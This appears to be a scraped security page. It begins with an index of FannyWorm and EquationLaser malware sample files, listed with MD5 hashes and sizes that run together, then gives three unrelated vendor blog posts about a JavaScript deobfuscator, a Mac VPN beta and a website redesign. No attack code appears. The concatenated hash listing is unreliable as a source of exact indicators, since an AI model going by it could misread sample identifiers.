FannyWorm_B1CCEB79F74D48C94CA7E680A609BC65b1cceb79f74d48c94ca7e680a609bc65180 KB
FannyWorm_B4B05BB97521494B342DA8524A6181EDb4b05bb97521494b342da8524a6181ed180 KB
FannyWorm_B11DBC0C4E98B4CA224C18344CC5191Db11dbc0c4e98b4ca224c18344cc5191d180 KB
FannyWorm_B38A91B1A5D23D418C5C6D6A0B066C30b38a91b1a5d23d418c5c6d6a0b066c30180 KB
FannyWorm_B59F5C408FBA0E2CF503E0942AC46C56b59f5c408fba0e2cf503e0942ac46c56180 KB
FannyWorm_B78E9C9A49AA507CB1F905FDD455CA35b78e9c9a49aa507cb1f905fdd455ca35180 KB
FannyWorm_B322FB54B5E53F4EA93E04E5A2ABCCBCb322fb54b5e53f4ea93e04e5a2abccbc180 KB
FannyWorm_B747BB2EDC15A07CE61BCE4FD1A33EADb747bb2edc15a07ce61bce4fd1a33ead180 KB
FannyWorm_B9407C2933384F3E9461EAFB02749FECb9407c2933384f3e9461eafb02749fec180 KB
FannyWorm_B5738307BAB3FBF4CF2BDD652B0AC88Ab5738307bab3fbf4cf2bdd652b0ac88a180 KB
FannyWorm_BA38163FC6E75BB6ACD73BC7CF89089Bba38163fc6e75bb6acd73bc7cf89089b180 KB
FannyWorm_BA43976BB23531A9D4DC5F0AFD07327Aba43976bb23531a9d4dc5f0afd07327a180 KB
FannyWorm_BAC9A35D7CDF8C217B51C189A7B7B2FDbac9a35d7cdf8c217b51c189a7b7b2fd180 KB
FannyWorm_BB5AA3E042C802C294FA233C4DB41393bb5aa3e042c802c294fa233c4db41393180 KB
FannyWorm_BCC5D198A60878C03A114E45ACDFE417bcc5d198a60878c03a114e45acdfe417180 KB
FannyWorm_BD7A693767DE2EAE08B4C63AAA84DB43bd7a693767de2eae08b4c63aaa84db43180 KB
FannyWorm_BD9E6F35DC7FE987EEFA048ADC94D346bd9e6f35dc7fe987eefa048adc94d346180 KB
FannyWorm_BDC3474D7A5566916DC0A2B3075D10BEbdc3474d7a5566916dc0a2b3075d10be180 KB
FannyWorm_BED58D25C152BD5B4A9C022B5B863C72bed58d25c152bd5b4a9c022b5b863c72180 KB
FannyWorm_BFDE4B5CD6CC89C6996C5E30C36F0273bfde4b5cd6cc89c6996c5e30c36f0273180 KB
FannyWorm_C1F171A7689958EB500079AB0185915Fc1f171a7689958eb500079ab0185915f180 KB
FannyWorm_C3DA3234A3764CA81D694C3935BF55CFc3da3234a3764ca81d694c3935bf55cf180 KB
FannyWorm_C6E8841104D7D93F8AA11C1AC6E669EDc6e8841104d7d93f8aa11c1ac6e669ed180 KB
FannyWorm_C47DE651EF941FECC5F1738984094689c47de651ef941fecc5f1738984094689180 KB
FannyWorm_C69DFB1302032D28DF98AE70474809F2c69dfb1302032d28df98ae70474809f2180 KB
FannyWorm_C303AFE1648D3B70591FEEFFE78125EDc303afe1648d3b70591feeffe78125ed180 KB
FannyWorm_C05255625BB00EB12EAF95CB41FCC7F5c05255625bb00eb12eaf95cb41fcc7f5180 KB
FannyWorm_CA67E52F1948802A3ED95C345D7C221Aca67e52f1948802a3ed95c345d7c221a180 KB
FannyWorm_CA0080102EDC1380FFBF6E3E690C9229ca0080102edc1380ffbf6e3e690c9229180 KB
FannyWorm_CBFAD455F0B313001DDC5B898A9527DFcbfad455f0b313001ddc5b898a9527df180 KB
FannyWorm_CC9D8C6B3479DD4FB626080BB121FAD9cc9d8c6b3479dd4fb626080bb121fad9180 KB
FannyWorm_CD6F75DCC55E022E3010E27E1F657535cd6f75dcc55e022e3010e27e1f657535180 KB
FannyWorm_CE632C26186F93444C1F7EE67D63E367ce632c26186f93444c1f7ee67d63e367180 KB
FannyWorm_CEAD6E447E17EEA51551C8D9ECE28996cead6e447e17eea51551c8d9ece28996180 KB
FannyWorm_CEF313D70FF3C31316958D5CD2A4C23Acef313d70ff3c31316958d5cd2a4c23a180 KB
FannyWorm_CFB84687E933DDAD2CBCD7BA2BC1D0A5cfb84687e933ddad2cbcd7ba2bc1d0a5180 KB
FannyWorm_CFE2AB3F0FF585D3AC41241DEF6E5818cfe2ab3f0ff585d3ac41241def6e5818180 KB
FannyWorm_D3E9D526EB2B257A9F1F9CEF22BB2911d3e9d526eb2b257a9f1f9cef22bb2911180 KB
FannyWorm_D5E736B9FEDE558542AC3588E308108Ed5e736b9fede558542ac3588e308108e180 KB
FannyWorm_D6AD56E705AE3C26E3D632C40CD686C3d6ad56e705ae3c26e3d632c40cd686c3180 KB
FannyWorm_D7E241EA4619CEED15FA3FA31751C97Fd7e241ea4619ceed15fa3fa31751c97f180 KB
FannyWorm_D7EB64F9644B83FCF9933F73A4C3D6E2d7eb64f9644b83fcf9933f73a4c3d6e2180 KB
FannyWorm_D7F18DAFA65F16590AE0544A637886E0d7f18dafa65f16590ae0544a637886e0180 KB
FannyWorm_D8A7AAD5247B224246DC79BACBBF3105d8a7aad5247b224246dc79bacbbf3105180 KB
FannyWorm_D8C6E712BB308BFD98E9406BB2C742EBd8c6e712bb308bfd98e9406bb2c742eb180 KB
FannyWorm_D9C5634687173631DD12E168B98016C4d9c5634687173631dd12e168b98016c4180 KB
FannyWorm_D9CCA3C8F623D823F76CD2997CF51E4Cd9cca3c8f623d823f76cd2997cf51e4c180 KB
FannyWorm_D34AACF1F8F1697B6EEEC0C696C79B44d34aacf1f8f1697b6eeec0c696c79b44180 KB
FannyWorm_D181C6651911946B12C089EE638B01C4d181c6651911946b12c089ee638b01c4180 KB
FannyWorm_D427C593B863638ED09FC852B8A3B9E6d427c593b863638ed09fc852b8a3b9e6180 KB
FannyWorm_D602E83E0DCC3AF6A18A906257D37670d602e83e0dcc3af6a18a906257d37670180 KB
FannyWorm_D725AD28ED161F160D6F8E9611CBD0D9d725ad28ed161f160d6f8e9611cbd0d9180 KB
FannyWorm_D794C1E3A6A3118D8E0A89F15B9629DAd794c1e3a6a3118d8e0a89f15b9629da180 KB
FannyWorm_D74485AE9CBD57132084CAF8261D00F4d74485ae9cbd57132084caf8261d00f4180 KB
FannyWorm_D97413AB3D1312E3C10CE532427FCB16d97413ab3d1312e3c10ce532427fcb16180 KB
FannyWorm_D725169048109CD96322A492A56CDB19d725169048109cd96322a492a56cdb19180 KB
FannyWorm_DA1FF92D6C6FCE304264140515CBAD62da1ff92d6c6fce304264140515cbad62180 KB
FannyWorm_DA9D9EF2AA44B33F1AB01F852E82F40Eda9d9ef2aa44b33f1ab01f852e82f40e180 KB
FannyWorm_DA066470D7DB99848EDB677E5896E02Cda066470d7db99848edb677e5896e02c180 KB
FannyWorm_DAFB3935EEA5CD4DA3065A837728A093dafb3935eea5cd4da3065a837728a093180 KB
FannyWorm_DB7EAC1F97E3A75F7C373C16FD57B836db7eac1f97e3a75f7c373c16fd57b836180 KB
FannyWorm_DB19266D25990725150DA793A93809A4db19266d25990725150da793a93809a4180 KB
FannyWorm_DB37630DF9E74E83769C1E283CF2A47Ddb37630df9e74e83769c1e283cf2a47d180 KB
FannyWorm_DB296461B2E02E2370CA05680879760Edb296461b2e02e2370ca05680879760e180 KB
FannyWorm_DC7AD1008509D0A67DBAFDE8ECFFB4BEdc7ad1008509d0a67dbafde8ecffb4be180 KB
FannyWorm_DC30E98AEE84B6C92B4E3EECDF96DD89dc30e98aee84b6c92b4e3eecdf96dd89180 KB
FannyWorm_DD304F6023F506C82F1DF68ADB005C16dd304f6023f506c82f1df68adb005c16180 KB
FannyWorm_DDEFF291518F4677C5FA7518F2A3D716ddeff291518f4677c5fa7518f2a3d716180 KB
FannyWorm_DEAD476E45FDBD19D2CAF657112442E3dead476e45fdbd19d2caf657112442e3180 KB
FannyWorm_DEE0D7B094A7C7689CFC66DEE54E0ECDdee0d7b094a7c7689cfc66dee54e0ecd180 KB
FannyWorm_E2E44E5A156563E3D1902E8C34B295D8e2e44e5a156563e3d1902e8c34b295d8180 KB
FannyWorm_E4E25DB65C227926956000FFDC428EAFe4e25db65c227926956000ffdc428eaf180 KB
FannyWorm_E07D0DFF23B5FABE22F107ED634D026Ee07d0dff23b5fabe22f107ed634d026e180 KB
FannyWorm_E10A9DF3745684581EA3CF5AB22E3E90e10a9df3745684581ea3cf5ab22e3e90180 KB
FannyWorm_E10F5EDEE21623E734753F6F35672DAEe10f5edee21623e734753f6f35672dae180 KB
FannyWorm_E62EDA3959D7AC27754AE1A97996D03Be62eda3959d7ac27754ae1a97996d03b180 KB
FannyWorm_E68C8BEBC21A93E0CC638B793E345F63e68c8bebc21a93e0cc638b793e345f63180 KB
FannyWorm_E76F734B6F717BB5987CD972ED9D0389e76f734b6f717bb5987cd972ed9d0389180 KB
FannyWorm_E78A4E8BECA2CCD7E77889B3BEDBB729e78a4e8beca2ccd7e77889b3bedbb729180 KB
FannyWorm_E762B8FCD20D62049DB35327D31D2709e762b8fcd20d62049db35327d31d2709180 KB
FannyWorm_E2320F490CBB2E082E699EBEB0FAA917e2320f490cbb2e082e699ebeb0faa917180 KB
FannyWorm_E4678EC7825DF4AC71E4F8DC9D806C7Be4678ec7825df4ac71e4f8dc9d806c7b180 KB
FannyWorm_E3515334BB2BCB77D10ECEEDD9661BEBe3515334bb2bcb77d10eceedd9661beb180 KB
FannyWorm_E33894883C1A1A5DDBE8E391225CD1FBe33894883c1a1a5ddbe8e391225cd1fb180 KB
FannyWorm_E81665906732C73D27F005157B552A43e81665906732c73d27f005157b552a43180 KB
FannyWorm_EA943C7CC83D853DE678C58B838FBD65ea943c7cc83d853de678c58b838fbd65180 KB
FannyWorm_EAFD1A95D51662C41577E5833F290875eafd1a95d51662c41577e5833f290875180 KB
FannyWorm_ECE7AA61BE647E85DDBE3B2A757837FAece7aa61be647e85ddbe3b2a757837fa180 KB
FannyWorm_ED2E8BD08B3A4B90383BCEC3A9B41273ed2e8bd08b3a4b90383bcec3a9b41273180 KB
FannyWorm_EE083C9213978F517E80FAA5C8557110ee083c9213978f517e80faa5c8557110180 KB
FannyWorm_EE119065AA37ED346DB35B62003A720Eee119065aa37ed346db35b62003a720e180 KB
FannyWorm_EEF3A1F9EAE6CBA0C00529A12B0666ABeef3a1f9eae6cba0c00529a12b0666ab180 KB
FannyWorm_F1ECC7FF709F4386C1A3D2FF448FD5F9f1ecc7ff709f4386c1a3d2ff448fd5f9180 KB
FannyWorm_F5AF8D37CABE19EF922306FD4A8F913Df5af8d37cabe19ef922306fd4a8f913d180 KB
FannyWorm_F5F92322B0EA96FE78A3755188EB669Ef5f92322b0ea96fe78a3755188eb669e180 KB
FannyWorm_F7DE4D38FE0FBCC9D362D471A5E0282Bf7de4d38fe0fbcc9d362d471a5e0282b180 KB
FannyWorm_F22CF337F70B2306F3CA740338086912f22cf337f70b2306f3ca740338086912180 KB
FannyWorm_F26CDE2983041867EDEF171AF7F7DA73f26cde2983041867edef171af7f7da73180 KB
FannyWorm_F30D4488E520C6DB3AE59A87EE0245B4f30d4488e520c6db3ae59a87ee0245b4180 KB
FannyWorm_F72B462536299D3063B1B2E1AD883429f72b462536299d3063b1b2e1ad883429180 KB
FannyWorm_F3417EFC13A1ED1284625CA97AA49377f3417efc13a1ed1284625ca97aa49377180 KB
FannyWorm_F4776D8F718F1BB836E6FBA9EBCB1E77f4776d8f718f1bb836e6fba9ebcb1e77180 KB
FannyWorm_F5879F2121AEE5E49DFA7B39FC97F073f5879f2121aee5e49dfa7b39fc97f073180 KB
FannyWorm_F8406D97147F90C3255AAA32452C7683f8406d97147f90c3255aaa32452c7683180 KB
FannyWorm_F38544F22C57F7969915FF1919AC882Ff38544f22c57f7969915ff1919ac882f180 KB
FannyWorm_F77534EBE9C8CCC5009B6A6BA06668CBf77534ebe9c8ccc5009b6a6ba06668cb180 KB
FannyWorm_F493229F25A16952CEA321FD932F6976f493229f25a16952cea321fd932f6976180 KB
FannyWorm_F4482216C514F5C59F1E9A91FBF84F3Af4482216c514f5c59f1e9a91fbf84f3a180 KB
FannyWorm_FA1A156581F808628696E300C28AB9ABfa1a156581f808628696e300c28ab9ab180 KB
FannyWorm_FA8C3438E459E7A437F5A2F551BA02CAfa8c3438e459e7a437f5a2f551ba02ca180 KB
FannyWorm_FB82E3DD585746B14A0489B5F10E22D2fb82e3dd585746b14a0489b5f10e22d2180 KB
FannyWorm_FCC3BCAD73BA57207CBF5CC00077E5B4fcc3bcad73ba57207cbf5cc00077e5b4180 KB
FannyWorm_FE53A01127659A1A1E6EB451B55FFCAAfe53a01127659a1a1e6eb451b55ffcaa180 KB
FannyWorm_FF7DA1D4CB2AA4ACC862033293BE699Cff7da1d4cb2aa4acc862033293be699c180 KB
FannyWorm_FFAD870F291ACCCBE148673F579689DBffad870f291acccbe148673f579689db180 KB
EquationLaser_0D1DC631B17DEED6E53D593DCC2E0CA10d1dc631b17deed6e53d593dcc2e0ca1130 KB
EquationLaser_2FE4D4BC00266089DB7EAC05D1F086202fe4d4bc00266089db7eac05d1f08620130 KB
EquationLaser_8E2C06B52F530C9F9B5C2C743A5BB28A8e2c06b52f530c9f9b5c2c743a5bb28a130 KB
EquationLaser_32C53DF631217D0B5F9F46D3A924671532c53df631217d0b5f9f46d3a9246715130 KB
EquationLaser_45DF8669908A259A22C44278C228972145df8669908a259a22c44278c2289721130 KB
EquationLaser_6480843080ADD60B825EFE0532DC727B6480843080add60b825efe0532dc727b130 KB
EquationLaser_C96284363374597A3AC4B07C77E8325Bc96284363374597a3ac4b07c77e8325b130 KB
EquationLaser_DE356F2A55B25E04742423B5EC56DE93de356f2a55b25e04742423b5ec56de93130 KB

Posted: 16 Mar 2016 | 9:18 pm

Script Deobfuscator Updated

Continuing from my last blog post, I updated the program to handle the latest obfuscated Javascript technique. I made the logic generic in order to handle future versions and variants so the results may come out a bit weird (e.g. stray tick marks). But the main thing is that you’ll be able to see what these scripts are doing.

I broke out the concatenation option by script type so this should improve the results somewhat better than before.




I hope this works for most of the scripts you encounter. And thank you for your continued support!

Posted: 22 Feb 2016 | 7:24 pm

Freedome VPN For Mac OS X

Take a look at this:

F-Secure Freedome Mac OS X

F-Secure Freedome for OS X (freshly installed on a Labs Mac Team MacBook).


The beta is now open for everyone to try for 60 days at no cost.

Download or share.

On 24/04/15 At 12:37 PM

Posted: 24 Apr 2015 | 1:37 am

New Website for Cyber Engineering Services

If you’ve visited our website before your may notice some changes this time around. Our old site served us well but as we are moving forward as a company we felt it was time for a fresh new look for the website to reflect the fresh new ideas being developed in our company. Besides the attractive new color palette and flashy new slider we’ve streamlined our content and cleaned things up. There are also a few new features to check out. You may have noticed Cyber Engineering Services in the news lately, we added a NEWS section where you can check out all the buzz and catch up on anything you missed. We have also added a section called LEADERSHIP were you can read a bit about the fearless leaders we have taking up the helm and keeping us on our toes here at Cyber Engineering Services.

If this is your first time visiting our site, look around and sample a few pages, we’ve tried our best to lay things out so its easy to find what you need quickly. If you still have questions feel free to contact us, we’d love to talk with you. If you have suggestions for our website, feel free to comment below, we’d love to hear your feedback.

Posted: 3 Sep 2014 | 7:39 am